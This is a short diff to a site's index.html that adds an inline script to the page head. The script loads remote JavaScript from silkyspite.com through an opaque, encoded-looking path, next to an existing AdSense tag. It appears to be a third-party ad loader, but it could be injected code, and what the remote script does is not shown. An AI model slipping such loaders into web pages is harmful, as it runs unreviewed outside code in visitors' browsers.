--- a/index.html
+++ b/index.html
@@ -3,7 +3,18 @@
 <html lang="en">
 <head>
 
-	
+	<script>
+(function(dgx){
+var d = document,
+    s = d.createElement('script'),
+    l = d.scripts[d.scripts.length - 1];
+s.settings = dgx || {};
+s.src = "\/\/silkyspite.com\/c\/DS9.6pbM2\/5OlhSQWdQj9LNBjBYM2RMxDdce3-MsiH0y2cN\/j-YpwZNBzOcXzz";
+s.async = true;
+s.referrerPolicy = 'no-referrer-when-downgrade';
+l.parentNode.insertBefore(s, l);
+})({})
+</script>
 
 <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-1869455728729943"
      crossorigin="anonymous"></script>	
